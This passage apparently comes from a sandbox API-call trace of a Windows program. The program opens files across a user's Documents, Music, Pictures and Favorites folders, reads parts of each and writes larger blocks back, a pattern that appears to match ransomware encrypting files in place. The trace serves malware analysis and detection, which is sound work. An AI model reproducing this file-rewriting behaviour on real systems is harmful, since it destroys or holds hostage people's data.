lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.288] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6ec1 [0177.288] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.288] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6ec1 [0177.289] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.289] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.290] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0177.290] CloseHandle (hObject=0x1d8) returned 1 [0177.290] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QBtOB97D\\6vIz1HbRHrbVmK nOB.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbtob97d\\6viz1hbrhrbvmk nob.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.290] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.291] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xabfb [0177.291] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.291] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.291] ReleaseMutex (hMutex=0x168) returned 1 [0177.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="6vIz1HbRHrbVmK nOB.ots", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0177.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="6vIz1HbRHrbVmK nOB.ots", cchWideChar=22, lpMultiByteStr=0x1f88bcc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6vIz1HbRHrbVmK nOB.ots", lpUsedDefaultChar=0x0) returned 22 [0177.291] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.292] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9bfb [0177.293] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.293] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x9bfb [0177.293] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a76d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a76d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.316] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.316] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.316] CloseHandle (hObject=0x1d8) returned 1 [0177.317] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.318] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.318] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x11a [0177.318] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.318] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.318] ReleaseMutex (hMutex=0x168) returned 1 [0177.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0177.318] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ecc788, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ecc788*, lpNumberOfBytesRead=0x359f2bc*=0x11a, lpOverlapped=0x0) returned 1 [0177.319] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0177.319] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6a2, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x6a2, lpOverlapped=0x0) returned 1 [0177.319] CloseHandle (hObject=0x1d8) returned 1 [0177.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.320] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.320] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x85 [0177.320] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.321] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.321] ReleaseMutex (hMutex=0x168) returned 1 [0177.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Work.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Work.url", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft At Work.url", lpUsedDefaultChar=0x0) returned 21 [0177.321] ReadFile (in: hFile=0x1d8, lpBuffer=0x26739c8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26739c8*, lpNumberOfBytesRead=0x359f2bc*=0x85, lpOverlapped=0x0) returned 1 [0177.322] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0177.322] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x359f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0177.322] CloseHandle (hObject=0x1d8) returned 1 [0177.322] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.324] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.324] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x85 [0177.324] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.324] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.324] ReleaseMutex (hMutex=0x168) returned 1 [0177.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Get Windows Live.url", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0177.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Get Windows Live.url", cchWideChar=20, lpMultiByteStr=0x1f88bcc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get Windows Live.url", lpUsedDefaultChar=0x0) returned 20 [0177.324] ReadFile (in: hFile=0x1d8, lpBuffer=0x26739c8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26739c8*, lpNumberOfBytesRead=0x359f2bc*=0x85, lpOverlapped=0x0) returned 1 [0177.326] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0177.326] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x359f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0177.326] CloseHandle (hObject=0x1d8) returned 1 [0177.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.326] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.327] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1f8 [0177.327] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.327] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.327] ReleaseMutex (hMutex=0x168) returned 1 [0177.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.327] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0177.327] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x359f2bc*=0x1f8, lpOverlapped=0x0) returned 1 [0177.328] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0177.328] WriteFile (in: hFile=0x1d8, lpBuffer=0x2842988*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2842988*, lpNumberOfBytesWritten=0x359f2d0*=0x780, lpOverlapped=0x0) returned 1 [0177.329] CloseHandle (hObject=0x1d8) returned 1 [0177.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\DXsSdrVpN3W7Cdf\\JyKGfUBciotMP6mSt6Y8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\dxssdrvpn3w7cdf\\jykgfubciotmp6mst6y8.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.329] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.329] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa0ed [0177.329] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.329] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.329] ReleaseMutex (hMutex=0x168) returned 1 [0177.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JyKGfUBciotMP6mSt6Y8.m4a", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0177.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JyKGfUBciotMP6mSt6Y8.m4a", cchWideChar=24, lpMultiByteStr=0x1f8fc6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JyKGfUBciotMP6mSt6Y8.m4a", lpUsedDefaultChar=0x0) returned 24 [0177.329] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.331] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x90ed [0177.331] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.331] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x90ed [0177.331] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a76d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a76d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.331] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.331] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.331] CloseHandle (hObject=0x1d8) returned 1 [0177.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\kEGn-7rcTvps-n\\mTWFE2bLWWS yyUM7zuB.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\kegn-7rctvps-n\\mtwfe2blwws yyum7zub.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.332] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.332] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x990e [0177.332] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.332] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.332] ReleaseMutex (hMutex=0x168) returned 1 [0177.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mTWFE2bLWWS yyUM7zuB.mp3", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0177.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mTWFE2bLWWS yyUM7zuB.mp3", cchWideChar=24, lpMultiByteStr=0x1f8fc6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mTWFE2bLWWS yyUM7zuB.mp3", lpUsedDefaultChar=0x0) returned 24 [0177.332] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.333] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x890e [0177.333] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.334] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x890e [0177.334] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a76d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a76d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.334] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.334] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.334] CloseHandle (hObject=0x1d8) returned 1 [0177.334] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dk2_EzNhKbGEIsxH\\z lfjHnieP\\LQ kt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dk2_eznhkbgeisxh\\z lfjhniep\\lq kt.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.335] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.335] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x18314 [0177.335] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.335] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.335] ReleaseMutex (hMutex=0x168) returned 1 [0177.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LQ kt.m4a", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LQ kt.m4a", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LQ kt.m4a", lpUsedDefaultChar=0x0) returned 9 [0177.335] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.336] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x17314 [0177.336] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.336] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x17314 [0177.337] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a76d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a76d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.337] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.337] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.337] CloseHandle (hObject=0x1d8) returned 1 [0177.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\rVja q1XZJsU.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5kv2w3l69- l7u9zn7\\rvja q1xzjsu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.337] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.338] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xa35d [0177.338] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, 